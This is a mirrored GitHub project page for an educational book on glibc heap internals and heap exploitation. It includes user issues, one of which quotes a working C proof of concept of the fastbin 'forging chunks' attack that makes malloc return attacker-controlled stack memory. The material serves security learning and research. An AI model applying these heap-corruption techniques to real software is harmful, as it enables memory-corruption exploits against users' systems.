Coder Social home page Coder Social logo

dhavalkapil / heap-exploitation Goto Github PK

View Code? Open in Web Editor NEW
1.2K 44.0 115.0 359 KB

This book on heap exploitation is a guide to understanding the internals of glibc's heap and various attacks possible on the heap structure.

Home Page: https://heap-exploitation.dhavalkapil.com/

C 100.00%
book heap security

heap-exploitation's Introduction

Heap Exploitation

This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.

The first section of the book covers an in-depth, yet concise, description about heap internals. The second section covers some of the most famous attacks. It is assumed that the reader is unfamiliar with this topic. For experienced readers, this text might be good for a quick revision.

Read for free online (recommended) or download the PDF or ePUB or Mobi/Kindle editions.

Citing heap-exploitation

If you use this book in your research, please use the following BibTex entry:

@software{dhaval_kapil_2022_6450612,
  author       = {Dhaval Kapil},
  title        = {DhavalKapil/heap-exploitation},
  month        = apr,
  year         = 2022,
  publisher    = {Zenodo},
  version      = {v1.0.0},
  doi          = {10.5281/zenodo.6450612},
  url          = {https://doi.org/10.5281/zenodo.6450612}
}

Creative Commons License

This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

heap-exploitation's People

Contributors

ashishhacker avatar dhavalkapil avatar integeruser avatar janniskirschner avatar jwilk avatar kibouo avatar tkeetch avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

chubbymaggie projectboot clicknull poeblu olivierh59500 idkwim kakuye johnjohnsp1 awstahl shekkbuilder n3k hhy5277 johndpope theotherside ismailbozkurt tmcmil initpwn wjybluse icaas atimorin boh jeperez bijaye agahlot ang3ll niejuhu kuteminh11 connlan techlord-rce modesth2 butterflyhack b1gw00d s3ize zcddtb orf53975 skyroot cozmavladimir adi1998 jmcardon raduemanuel92 t2kien r3dfruitrollup dshtanger andreafioraldi a10ncoder c002 pedroafontes wireghoul houcy sploitamos fcccode mytutoriall crackercat ip-2014 awrheaven hausferd qiuba2008 heruix tesuji jotamjr loneworld avlidienbrunn l9sk mmg1 mengshili curioustauseef vlbos chnxyzz ahmedsakrr janniskirschner chenzhengchen200821109 imulmul fengjixuchui johnwax xtenex w4nn4die dazhu devu-62442 ekincanufuktepe mgcc-0208 ali-izadi-97 f0829 shaojiedong ptr-yudai 5l1v3r1 cheaterdxd evilares queencitycyber onesorzer0es fdlucifer pcanyi datascientist1976 mojodojo101 kibouo kejripraveen sengkyaut ckexploits lordcasser corsair-cxs enascimento

heap-exploitation's Issues

forging chunk issues

Hi! I am trying "forging chunks" in a x64 machine, Ubuntu 18.04.2 LTS.

This is the code I am execution + some printf for debug.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {

  struct forged_chunk {
    size_t prev_size;
    size_t size;
    struct forged_chunk *fd;
    struct forged_chunk *bck;
    char buf[10];               // padding
  };

  // First grab a fast chunk
  char *a = malloc(10);               // 'a' points to 0x219c010

  printf("a: %p\n", a);

  // Create a forged chunk
  struct forged_chunk chunk;    // At address 0x7ffc6de96690
  printf("chunk: %p\n", &chunk);
  chunk.size = 0x20;            // This size should fall in the same fastbin
  char* data = (char *)&chunk.fd;     // Data starts here for an allocated chunk
  strcpy(data, "attacker's data");
  printf("data %p\n", data);

  // Put the fast chunk back into fastbin
  free(a);
  // Modify 'fd' pointer of 'a' to point to our forged chunk
  *((unsigned long long *)a) = (unsigned long long)&chunk;
  // Remove 'a' from HEAD of fastbin
  // Our forged chunk will now be at the HEAD of fastbin
  char* aa = malloc(10);                   // Will return 0x219c010
  printf("aa: %p\n", aa);

  char* victim = malloc(10);          // Points to 0x7ffc6de966a0
  printf("victim: %p\n", &victim);
  printf("%s\n", victim);       // Prints "attacker's data" !!

  return 0;
}

While this is the optput:

a: 0x5646ebdb2260
chunk: 0x7ffff376dff0
data 0x7ffff376e000
aa: 0x5646ebdb2260
victim: 0x7ffff376dfd0
�

But the victim address is not aligned as expected.

Do you have any idea?

clarification on "victim" symbol

I've noticed it's not very clear, at first, when you use the name "victim" in the first chapters of the book referring to the malloc-ed chunk. I had to search a bit to find out you have used this name with the same meaning of the one used in the black hat's paper you referenced in the first pages. I think it would be better if you added a paragraph explaining victim = malloc(0xbadc0de) or something like that.

Forging chunks example not working

I guess this line is not correct anymore:
https://github.com/DhavalKapil/heap-exploitation/blame/master/attacks/forging_chunks.md#L51

Atleast i needed to change the following line in the example:
chunk.size = 0x20;
to:
chunk.size = 0x11;

to be able to test this.

Info about package installed:

Package: libc6-i386
Status: install ok installed
Priority: optional
Section: libs
Installed-Size: 10187
Maintainer: Ubuntu Developers <[email protected]>
Architecture: amd64
Source: glibc
Version: 2.23-0ubuntu10
Replaces: libc6-dev-i386
Depends: libc6 (= 2.23-0ubuntu10)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.